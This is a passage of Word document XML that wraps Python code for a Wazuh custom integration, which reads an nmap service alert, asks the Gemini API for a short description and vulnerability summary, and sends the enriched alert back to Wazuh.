              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>now = time.strftime("%a %b %d %H:%M:%S %Z %Y")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B75DBA0" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="637764FC" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>log_file = f"{pwd}/logs/integrations.log"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="766A0BE8" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>socket_addr = f"{pwd}/queue/sockets/queue"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D57C6DB" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B7497E7" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t># ---- DEBUG ----</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12F43251" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>def debug(msg):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D3B0626" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    if debug_enabled:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C67A68A" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        out = f"{now}: {msg}\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F6CC197" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        print(out)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4BA64F" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        with open(log_file, "a") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6337E01E" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">            f.write(out)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="719DBA4F" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B01599E" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t># ---- GEMINI QUERY ----</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD7D20D" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>def query_gemini(nmap_port_service, apikey):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BA1F36C" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    url = "https://generativelanguage.googleapis.com/v1beta/models/gemini-2.0-flash:generateContent"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F0440A2" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    headers = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61309537" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        "Content-Type": "application/json",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FD93D51" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        "X-Goog-Api-Key": apikey</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C121A33" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D840533" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    payload = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CC833F2" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        "contents": [{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477D8A27" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">            "parts": [{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3629DFB2" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">                "text": f"In 4-5 sentences, explain the service '{nmap_port_service}', list common vulnerabilities (if any), and give a recommendation."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F778E38" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">            }]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28980364" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        }]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC6CF58" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="680D4FC3" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61B9E226" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    response = requests.post(url, headers=headers, json=payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3325C4BD" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4AF966F1" w14:textId="77777777" w:rsidR="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:t>if response.status_code == 200:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CEF150C" w14:textId="77777777" w:rsidR="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        gemini_data = response.json()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B0763F8" w14:textId="77777777" w:rsidR="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45930F8A" w14:textId="77777777" w:rsidR="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            text_output = gemini_data["candidates"][0]["content"]["parts"][0]["text"]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35C7F0EF" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00462151">
              <w:t>except Exception:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5272C575" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">            text_output = "No enrichment available."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="180E0208" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        return {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C70AF4A" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="001E2C55" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="001E2C55">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>"nmap_port_service": nmap_port_service,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A01A78A" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2C55">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00462151">
              <w:t>"gemini_summary": text_output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C852422" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC825BC" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5C8106" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        debug(f"# Error {response.status_code}: {response.text}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26CEBA51" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        return {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63CE8812" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>"nmap_port_service": nmap_port_service,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054701CB" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00462151">
              <w:t>"gemini_summary": "Error querying Gemini API"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="101C87C4" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31911477" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="25CADDCB" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t># ---- MAIN ----</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72AB6FF0" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t>def main(args):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35F2370F" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    if len(args) &lt; 2:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28371171" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        debug("# Exiting: Bad arguments.")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63A4F178" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        sys.exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49D06521" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AC48957" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    alert_file_location = args[1]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40D5AD17" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    apikey = os.getenv("GEMINI_API_KEY")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605E2711" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="170D9D9B" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    if not apikey:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00640267" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        debug("# Missing GEMINI_API_KEY in environment.")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17BCDAA6" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        sys.exit(1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="431CD2BF" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43CDB353" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    # Load alert</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45653D36" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    with open(alert_file_location) as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57EA1416" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        alert = json.load(f)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A11772B" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B158B09" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    debug(f"# Processing alert: {alert}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="248386A7" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64D178DA" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    if "nmap_port_service" not in alert.get("data", {}):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53162846" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        debug("# No nmap_port_service found in alert. Exiting.")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1413E08C" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        return</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599A098A" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="056CD332" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    # Query Gemini</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AEED365" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    enriched = query_gemini(alert["data"]["nmap_port_service"], apikey)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7730A64D" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2068C54C" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    # Build enriched alert</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E65A8AF" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">    alert_output = {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0524A1" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">        "integration": "custom-gemini",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="595B136C" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>"gemini": enriched,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1604F565" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">        "source_alert": alert</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5746F164" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A77107" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00567DF6" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DA8025E" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00567DF6">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00462151">
              <w:t>send_event(alert_output, alert.get("agent"))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416FAE69" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7482B8F3" w14:textId="77777777" w:rsidR="00462151" w:rsidRPr="00462151" w:rsidRDefault="00462151" w:rsidP="00462151">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00462151">
              <w:t># ---- SEND EVENT TO WAZUH ----</w:t>
            </w:r>
          </w:p>
